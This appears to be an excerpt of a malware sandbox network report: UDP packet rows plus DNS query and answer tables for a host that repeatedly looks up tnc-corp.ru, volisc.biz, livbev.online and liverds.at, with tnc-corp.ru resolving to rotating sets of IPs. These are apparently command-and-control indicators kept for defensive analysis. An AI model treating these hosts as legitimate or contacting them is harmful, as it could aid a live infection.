Oct 18, 2024 15:25:20.975022078 CEST	50798	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:21.985266924 CEST	50798	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:22.985188961 CEST	50798	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:25.000819921 CEST	50798	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:25.066471100 CEST	53	50798	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:25.066498995 CEST	53	50798	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:25.066510916 CEST	53	50798	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:25.066520929 CEST	53	50798	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:25.107106924 CEST	52172	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:25.117199898 CEST	53	52172	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:25.138149023 CEST	55752	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:26.141485929 CEST	55752	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:27.157077074 CEST	55752	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:29.158545017 CEST	55752	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:29.178175926 CEST	53	55752	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:29.178237915 CEST	53	55752	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:29.178277016 CEST	53	55752	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:29.178314924 CEST	53	55752	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:41.861756086 CEST	50566	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:42.934487104 CEST	50566	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:43.938376904 CEST	50566	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:45.938704014 CEST	50566	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:48.049012899 CEST	53	50566	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:48.049037933 CEST	53	50566	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:48.049050093 CEST	53	50566	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:48.049060106 CEST	53	50566	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:48.056133986 CEST	61838	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:48.065579891 CEST	53	61838	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:48.067883015 CEST	54580	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:49.094805002 CEST	54580	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:50.096664906 CEST	54580	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:25:52.172033072 CEST	53	54580	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:52.172060966 CEST	53	54580	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:52.172071934 CEST	53	54580	1.1.1.1	192.168.2.7
Oct 18, 2024 15:25:59.820841074 CEST	56040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:00.813415051 CEST	56040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:01.813462973 CEST	56040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:03.813461065 CEST	56040	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:06.127989054 CEST	53	56040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:06.128014088 CEST	53	56040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:06.128026962 CEST	53	56040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:06.129482985 CEST	53	56040	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:06.148075104 CEST	58917	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:06.196914911 CEST	53	58917	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:06.206852913 CEST	59875	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:07.204067945 CEST	59875	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:08.231293917 CEST	59875	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:10.219741106 CEST	59875	53	192.168.2.7	1.1.1.1
Oct 18, 2024 15:26:12.419866085 CEST	53	59875	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:12.419926882 CEST	53	59875	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:12.419939995 CEST	53	59875	1.1.1.1	192.168.2.7
Oct 18, 2024 15:26:12.419959068 CEST	53	59875	1.1.1.1	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Oct 18, 2024 15:22:28.390764952 CEST	192.168.2.7	1.1.1.1	0x4cba	Standard query (0)	tnc-corp.ru	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:29.769346952 CEST	192.168.2.7	1.1.1.1	0xf04a	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:30.770062923 CEST	192.168.2.7	1.1.1.1	0xf04a	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:31.775336981 CEST	192.168.2.7	1.1.1.1	0xf04a	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:33.781574011 CEST	192.168.2.7	1.1.1.1	0xf04a	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.942984104 CEST	192.168.2.7	1.1.1.1	0x3251	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.955821991 CEST	192.168.2.7	1.1.1.1	0xc6cd	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:36.969189882 CEST	192.168.2.7	1.1.1.1	0xc6cd	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:37.969008923 CEST	192.168.2.7	1.1.1.1	0xc6cd	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:39.969085932 CEST	192.168.2.7	1.1.1.1	0xc6cd	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:49.695633888 CEST	192.168.2.7	1.1.1.1	0xb33c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:50.692039967 CEST	192.168.2.7	1.1.1.1	0xb33c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:51.704430103 CEST	192.168.2.7	1.1.1.1	0xb33c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:53.781002045 CEST	192.168.2.7	1.1.1.1	0xb33c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.012118101 CEST	192.168.2.7	1.1.1.1	0xafd8	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.063111067 CEST	192.168.2.7	1.1.1.1	0xec0c	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:57.085745096 CEST	192.168.2.7	1.1.1.1	0xec0c	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:58.099508047 CEST	192.168.2.7	1.1.1.1	0xec0c	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:00.151673079 CEST	192.168.2.7	1.1.1.1	0xec0c	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:05.513475895 CEST	192.168.2.7	1.1.1.1	0x4dc	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:07.202269077 CEST	192.168.2.7	1.1.1.1	0x4dc	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:08.207942963 CEST	192.168.2.7	1.1.1.1	0x4dc	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:10.210892916 CEST	192.168.2.7	1.1.1.1	0x4dc	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.577419043 CEST	192.168.2.7	1.1.1.1	0x5206	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.616303921 CEST	192.168.2.7	1.1.1.1	0xf1d8	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:14.612255096 CEST	192.168.2.7	1.1.1.1	0xf1d8	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:15.632071972 CEST	192.168.2.7	1.1.1.1	0xf1d8	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:17.641366005 CEST	192.168.2.7	1.1.1.1	0xf1d8	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:26.419519901 CEST	192.168.2.7	1.1.1.1	0x8b4f	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:27.422954082 CEST	192.168.2.7	1.1.1.1	0x8b4f	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:28.423216105 CEST	192.168.2.7	1.1.1.1	0x8b4f	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:30.444686890 CEST	192.168.2.7	1.1.1.1	0x8b4f	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.604671955 CEST	192.168.2.7	1.1.1.1	0x91a1	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.618896961 CEST	192.168.2.7	1.1.1.1	0x22bb	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:33.807702065 CEST	192.168.2.7	1.1.1.1	0x22bb	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:34.801789999 CEST	192.168.2.7	1.1.1.1	0x22bb	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:36.910574913 CEST	192.168.2.7	1.1.1.1	0x22bb	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:45.265588999 CEST	192.168.2.7	1.1.1.1	0x881c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:46.268899918 CEST	192.168.2.7	1.1.1.1	0x881c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:47.271413088 CEST	192.168.2.7	1.1.1.1	0x881c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.282417059 CEST	192.168.2.7	1.1.1.1	0x881c	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.323482037 CEST	192.168.2.7	1.1.1.1	0x4732	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.338215113 CEST	192.168.2.7	1.1.1.1	0x4889	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:50.345654011 CEST	192.168.2.7	1.1.1.1	0x4889	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:51.466224909 CEST	192.168.2.7	1.1.1.1	0x4889	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:59.578164101 CEST	192.168.2.7	1.1.1.1	0xd8d2	Standard query (0)	tnc-corp.ru	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:01.403202057 CEST	192.168.2.7	1.1.1.1	0x646e	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:02.407104969 CEST	192.168.2.7	1.1.1.1	0x646e	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:03.406995058 CEST	192.168.2.7	1.1.1.1	0x646e	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:05.422641039 CEST	192.168.2.7	1.1.1.1	0x646e	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.609453917 CEST	192.168.2.7	1.1.1.1	0x9340	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.711960077 CEST	192.168.2.7	1.1.1.1	0xf003	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:08.909518957 CEST	192.168.2.7	1.1.1.1	0xf003	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:09.907243013 CEST	192.168.2.7	1.1.1.1	0xf003	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:11.928453922 CEST	192.168.2.7	1.1.1.1	0xf003	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:20.975022078 CEST	192.168.2.7	1.1.1.1	0xad17	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:21.985266924 CEST	192.168.2.7	1.1.1.1	0xad17	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:22.985188961 CEST	192.168.2.7	1.1.1.1	0xad17	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.000819921 CEST	192.168.2.7	1.1.1.1	0xad17	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.107106924 CEST	192.168.2.7	1.1.1.1	0x5169	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:25.138149023 CEST	192.168.2.7	1.1.1.1	0xa55b	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:26.141485929 CEST	192.168.2.7	1.1.1.1	0xa55b	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:27.157077074 CEST	192.168.2.7	1.1.1.1	0xa55b	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:29.158545017 CEST	192.168.2.7	1.1.1.1	0xa55b	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:41.861756086 CEST	192.168.2.7	1.1.1.1	0xa229	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:42.934487104 CEST	192.168.2.7	1.1.1.1	0xa229	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:43.938376904 CEST	192.168.2.7	1.1.1.1	0xa229	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:45.938704014 CEST	192.168.2.7	1.1.1.1	0xa229	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.056133986 CEST	192.168.2.7	1.1.1.1	0x7a3c	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:48.067883015 CEST	192.168.2.7	1.1.1.1	0x1810	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:49.094805002 CEST	192.168.2.7	1.1.1.1	0x1810	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:50.096664906 CEST	192.168.2.7	1.1.1.1	0x1810	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:59.820841074 CEST	192.168.2.7	1.1.1.1	0x68cd	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:00.813415051 CEST	192.168.2.7	1.1.1.1	0x68cd	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:01.813462973 CEST	192.168.2.7	1.1.1.1	0x68cd	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:03.813461065 CEST	192.168.2.7	1.1.1.1	0x68cd	Standard query (0)	volisc.biz	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.148075104 CEST	192.168.2.7	1.1.1.1	0x6051	Standard query (0)	livbev.online	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:06.206852913 CEST	192.168.2.7	1.1.1.1	0xf9c4	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:07.204067945 CEST	192.168.2.7	1.1.1.1	0xf9c4	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:08.231293917 CEST	192.168.2.7	1.1.1.1	0xf9c4	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:26:10.219741106 CEST	192.168.2.7	1.1.1.1	0xf9c4	Standard query (0)	liverds.at	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		58.151.148.90	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		201.191.99.134	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		116.58.10.60	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		187.228.106.109	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		152.0.254.142	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		190.146.112.188	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		185.12.79.25	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:28.578092098 CEST	1.1.1.1	192.168.2.7	0x4cba	No error (0)	tnc-corp.ru		123.212.43.225	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.938685894 CEST	1.1.1.1	192.168.2.7	0xf04a	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.938707113 CEST	1.1.1.1	192.168.2.7	0xf04a	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.938714981 CEST	1.1.1.1	192.168.2.7	0xf04a	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.938724041 CEST	1.1.1.1	192.168.2.7	0xf04a	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:35.952204943 CEST	1.1.1.1	192.168.2.7	0x3251	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:42.130131960 CEST	1.1.1.1	192.168.2.7	0xc6cd	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:42.131140947 CEST	1.1.1.1	192.168.2.7	0xc6cd	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:42.131154060 CEST	1.1.1.1	192.168.2.7	0xc6cd	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:22:42.131164074 CEST	1.1.1.1	192.168.2.7	0xc6cd	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.007730007 CEST	1.1.1.1	192.168.2.7	0xb33c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.007744074 CEST	1.1.1.1	192.168.2.7	0xb33c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.007752895 CEST	1.1.1.1	192.168.2.7	0xb33c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.007761002 CEST	1.1.1.1	192.168.2.7	0xb33c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:23:56.028278112 CEST	1.1.1.1	192.168.2.7	0xafd8	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:02.211215973 CEST	1.1.1.1	192.168.2.7	0xec0c	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:02.211251020 CEST	1.1.1.1	192.168.2.7	0xec0c	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:02.211282969 CEST	1.1.1.1	192.168.2.7	0xec0c	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:02.211309910 CEST	1.1.1.1	192.168.2.7	0xec0c	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.556353092 CEST	1.1.1.1	192.168.2.7	0x4dc	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.556402922 CEST	1.1.1.1	192.168.2.7	0x4dc	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.556416035 CEST	1.1.1.1	192.168.2.7	0x4dc	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.556427002 CEST	1.1.1.1	192.168.2.7	0x4dc	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:13.595170021 CEST	1.1.1.1	192.168.2.7	0x5206	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:19.829919100 CEST	1.1.1.1	192.168.2.7	0xf1d8	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:19.829935074 CEST	1.1.1.1	192.168.2.7	0xf1d8	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:19.829947948 CEST	1.1.1.1	192.168.2.7	0xf1d8	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:19.830018997 CEST	1.1.1.1	192.168.2.7	0xf1d8	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.593560934 CEST	1.1.1.1	192.168.2.7	0x8b4f	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.593571901 CEST	1.1.1.1	192.168.2.7	0x8b4f	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.593579054 CEST	1.1.1.1	192.168.2.7	0x8b4f	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.593585968 CEST	1.1.1.1	192.168.2.7	0x8b4f	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:32.615677118 CEST	1.1.1.1	192.168.2.7	0x91a1	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:38.881119013 CEST	1.1.1.1	192.168.2.7	0x22bb	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:38.881134987 CEST	1.1.1.1	192.168.2.7	0x22bb	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:38.881155968 CEST	1.1.1.1	192.168.2.7	0x22bb	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:38.881166935 CEST	1.1.1.1	192.168.2.7	0x22bb	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.310442924 CEST	1.1.1.1	192.168.2.7	0x881c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.310632944 CEST	1.1.1.1	192.168.2.7	0x881c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.310653925 CEST	1.1.1.1	192.168.2.7	0x881c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.310671091 CEST	1.1.1.1	192.168.2.7	0x881c	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:49.333623886 CEST	1.1.1.1	192.168.2.7	0x4732	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:53.434478045 CEST	1.1.1.1	192.168.2.7	0x4889	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:53.434560061 CEST	1.1.1.1	192.168.2.7	0x4889	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:24:53.434598923 CEST	1.1.1.1	192.168.2.7	0x4889	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		197.164.156.210	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		190.147.128.172	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		109.98.58.98	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		177.129.90.106	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		190.187.52.42	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		93.118.137.82	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		181.128.92.66	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		186.123.165.48	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		212.112.110.243	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:00.054860115 CEST	1.1.1.1	192.168.2.7	0xd8d2	No error (0)	tnc-corp.ru		189.195.132.134	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.605252028 CEST	1.1.1.1	192.168.2.7	0x646e	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.605292082 CEST	1.1.1.1	192.168.2.7	0x646e	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.605309010 CEST	1.1.1.1	192.168.2.7	0x646e	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.605686903 CEST	1.1.1.1	192.168.2.7	0x646e	Server failure (2)	volisc.biz	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:07.701316118 CEST	1.1.1.1	192.168.2.7	0x9340	Name error (3)	livbev.online	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:13.986584902 CEST	1.1.1.1	192.168.2.7	0xf003	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:13.986649036 CEST	1.1.1.1	192.168.2.7	0xf003	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:13.986691952 CEST	1.1.1.1	192.168.2.7	0xf003	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
Oct 18, 2024 15:25:13.986730099 CEST	1.1.1.1	192.168.2.7	0xf003	Server failure (2)	liverds.at	none	none	A (IP address)	IN (0x0001)	false
